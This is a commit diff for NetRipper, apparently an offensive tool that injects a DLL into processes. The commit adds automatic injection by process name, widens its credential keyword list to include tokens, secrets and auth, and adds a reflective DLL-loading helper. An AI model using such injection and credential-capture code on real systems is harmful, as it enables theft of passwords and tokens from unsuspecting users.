Added initial support for process monitoring

NytroRST · Jun 3, 2020 · 683ef1b · 683ef1b
1 parent ea136eb
commit 683ef1b
Show file tree

Hide file tree

Showing 21 changed files with 988 additions and 6 deletions.
diff --git a/Changelog.md b/Changelog.md
@@ -1,5 +1,8 @@
 # Changelog
 
+Version 1.1.25:
+- Added initial support for process monitoring
+
 Version 1.1.24:
 - Added support for Opera and SecureCRT
 

diff --git a/DLL/DynConfig.cpp b/DLL/DynConfig.cpp
@@ -7,13 +7,14 @@
 string DynConfig::s_sDataPath     = "TEMP";
 string DynConfig::s_sPlainText    = "false";
 string DynConfig::s_sDataLimit    = "65535";
-string DynConfig::s_sStringFinder = "user,login,pass,config";
+string DynConfig::s_sStringFinder = "user,login,pass,config,token,secret,auth";
+string DynConfig::s_sProcessList = "";
 
 // Default settings
 
 string DynConfig::s_sConfigurationString = 
 	"<NetRipper><plaintext>false</plaintext><datalimit>65535</datalimit><stringfinder>DEFAULT</stringfind"
-	"er><data_path>TEMP</data_path></NetRipper>----------------------------------------------------------"
+	"er><data_path>TEMP</data_path><processes></processes></NetRipper>-----------------------------------"
 	"----------------------------------------------------------------------------------------------------"
 	"----------------------------------------------------------------------------------------------------"
 	"----------------------------------------------------------------------------------------------------"
@@ -31,6 +32,7 @@ void DynConfig::Init()
 	s_sPlainText    = Utils::GetStringBetween(s_sConfigurationString, "<plaintext>", "</plaintext>");
 	s_sDataLimit    = Utils::GetStringBetween(s_sConfigurationString, "<datalimit>", "</datalimit>");
 	s_sStringFinder = Utils::GetStringBetween(s_sConfigurationString, "<stringfinder>", "</stringfinder>");
+	s_sProcessList  = Utils::GetStringBetween(s_sConfigurationString, "<processes>", "</processes>");
 }
 
 // Get plaintext plugin config
@@ -54,6 +56,13 @@ string DynConfig::GetStringFinder()
 	return s_sStringFinder;
 }
 
+// Get process list to auto-inject
+
+string DynConfig::GetProcessList()
+{
+	return s_sProcessList;
+}
+
 // Get the data path, create folder if it does not exists
 
 string DynConfig::GetDataPath()

diff --git a/DLL/DynConfig.h b/DLL/DynConfig.h
@@ -18,6 +18,7 @@ class DynConfig
 	static string s_sDataLimit;
 	static string s_sStringFinder;
 	static string s_sConfigurationString;
+	static string s_sProcessList;
 
 public:
 
@@ -26,6 +27,7 @@ class DynConfig
 	static string GetPlainText();
 	static string GetDataLimit();
 	static string GetStringFinder();
+	static string GetProcessList();
 };
 
 #endif
diff --git a/DLL/GetProcAddressR.cpp b/DLL/GetProcAddressR.cpp
@@ -0,0 +1,117 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#include "stdafx.h"
+#include "GetProcAddressR.h"
+//===============================================================================================//
+// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
+// wont be able to resolve exported addresses in reflectivly loaded librarys.
+FARPROC WINAPI GetProcAddressR(HANDLE hModule, LPCSTR lpProcName)
+{
+	UINT_PTR uiLibraryAddress = 0;
+	FARPROC fpResult = NULL;
+
+	if (hModule == NULL)
+		return NULL;
+
+	// a module handle is really its base address
+	uiLibraryAddress = (UINT_PTR)hModule;
+
+	__try
+	{
+		UINT_PTR uiAddressArray = 0;
+		UINT_PTR uiNameArray = 0;
+		UINT_PTR uiNameOrdinals = 0;
+		PIMAGE_NT_HEADERS pNtHeaders = NULL;
+		PIMAGE_DATA_DIRECTORY pDataDirectory = NULL;
+		PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
+
+		// get the VA of the modules NT Header
+		pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
+
+		pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
+
+		// get the VA of the export directory
+		pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(uiLibraryAddress + pDataDirectory->VirtualAddress);
+
+		// get the VA for the array of addresses
+		uiAddressArray = (uiLibraryAddress + pExportDirectory->AddressOfFunctions);
+
+		// get the VA for the array of name pointers
+		uiNameArray = (uiLibraryAddress + pExportDirectory->AddressOfNames);
+
+		// get the VA for the array of name ordinals
+		uiNameOrdinals = (uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals);
+
+		// test if we are importing by name or by ordinal...
+		if (((ADDRESS_VALUE)lpProcName & 0xFFFF0000) == 0x00000000)
+		{
+			// import by ordinal...
+
+			// use the import ordinal (- export ordinal base) as an index into the array of addresses
+			uiAddressArray += ((IMAGE_ORDINAL((ADDRESS_VALUE)lpProcName) - pExportDirectory->Base) * sizeof(DWORD));
+
+			// resolve the address for this imported function
+			fpResult = (FARPROC)(uiLibraryAddress + DEREF_32(uiAddressArray));
+		}
+		else
+		{
+			// import by name...
+			DWORD dwCounter = pExportDirectory->NumberOfNames;
+			while (dwCounter--)
+			{
+				char* cpExportedFunctionName = (char*)(uiLibraryAddress + DEREF_32(uiNameArray));
+
+				// test if we have a match...
+				if (strcmp(cpExportedFunctionName, lpProcName) == 0)
+				{
+					// use the functions name ordinal as an index into the array of name pointers
+					uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
+
+					// calculate the virtual address for the function
+					fpResult = (FARPROC)(uiLibraryAddress + DEREF_32(uiAddressArray));
+
+					// finish...
+					break;
+				}
+
+				// get the next exported function name
+				uiNameArray += sizeof(DWORD);
+
+				// get the next exported function name ordinal
+				uiNameOrdinals += sizeof(WORD);
+			}
+		}
+	}
+	__except (EXCEPTION_EXECUTE_HANDLER)
+	{
+		fpResult = NULL;
+	}
+
+	return fpResult;
+}
+//===============================================================================================//
diff --git a/DLL/GetProcAddressR.h b/DLL/GetProcAddressR.h
@@ -0,0 +1,44 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
+#define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
+//===============================================================================================//
+#include "ReflectiveDLLInjection.h"
+
+// Address type
+
+#if defined _M_X64
+#define ADDRESS_VALUE unsigned long long
+#elif defined _M_IX86
+#define ADDRESS_VALUE unsigned int
+#endif
+
+FARPROC WINAPI GetProcAddressR(HANDLE hModule, LPCSTR lpProcName);
+//===============================================================================================//
+#endif
+//===============================================================================================//
diff --git a/DLL/InjectedDLL.cpp b/DLL/InjectedDLL.cpp
@@ -10,6 +10,7 @@
 #include "NonExportedHooks.h"
 #include "PluginSystem.h"
 #include "Plugin.h"
+#include "ProcessMonitor.h"
 #include "MinHook.h"
 
 // Use minhook
@@ -71,6 +72,7 @@ void Inject()
 	DebugLog::Init();
 	FunctionFlow::Init();
 	DynConfig::Init();
+	ProcessMonitor::Init();
 
 	DebugLog::LogString("NetRipper: ", "Initialized!");
 

diff --git a/DLL/InjectedDLL.vcxproj b/DLL/InjectedDLL.vcxproj
@@ -121,13 +121,16 @@
     <ClInclude Include="DebugLog.h" />
     <ClInclude Include="DynConfig.h" />
     <ClInclude Include="FunctionFlow.h" />
+    <ClInclude Include="GetProcAddressR.h" />
     <ClInclude Include="HookedFunctions.h" />
     <ClInclude Include="InjectedDLL.h" />
+    <ClInclude Include="LoadLibraryR.h" />
     <ClInclude Include="NonExportedHooks.h" />
     <ClInclude Include="PCAP.h" />
     <ClInclude Include="Plugin.h" />
     <ClInclude Include="PluginSystem.h" />
     <ClInclude Include="Process.h" />
+    <ClInclude Include="ProcessMonitor.h" />
     <ClInclude Include="ReflectiveDLLInjection.h" />
     <ClInclude Include="ReflectiveLoader.h" />
     <ClInclude Include="stdafx.h" />
@@ -146,13 +149,16 @@
       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
       </PrecompiledHeader>
     </ClCompile>
+    <ClCompile Include="GetProcAddressR.cpp" />
     <ClCompile Include="HookedFunctions.cpp" />
     <ClCompile Include="InjectedDLL.cpp" />
+    <ClCompile Include="LoadLibraryR.cpp" />
     <ClCompile Include="NonExportedHooks.cpp" />
     <ClCompile Include="PCAP.cpp" />
     <ClCompile Include="Plugin.cpp" />
     <ClCompile Include="PluginSystem.cpp" />
     <ClCompile Include="Process.cpp" />
+    <ClCompile Include="ProcessMonitor.cpp" />
     <ClCompile Include="ReflectiveLoader.cpp" />
     <ClCompile Include="stdafx.cpp">
       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>

diff --git a/DLL/InjectedDLL.vcxproj.filters b/DLL/InjectedDLL.vcxproj.filters
@@ -59,6 +59,15 @@
     <ClInclude Include="PCAP.h">
       <Filter>Header Files</Filter>
     </ClInclude>
+    <ClInclude Include="GetProcAddressR.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="LoadLibraryR.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="ProcessMonitor.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <ClCompile Include="stdafx.cpp">
@@ -103,5 +112,14 @@
     <ClCompile Include="PCAP.cpp">
       <Filter>Source Files</Filter>
     </ClCompile>
+    <ClCompile Include="GetProcAddressR.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="LoadLibraryR.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="ProcessMonitor.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
   </ItemGroup>
 </Project>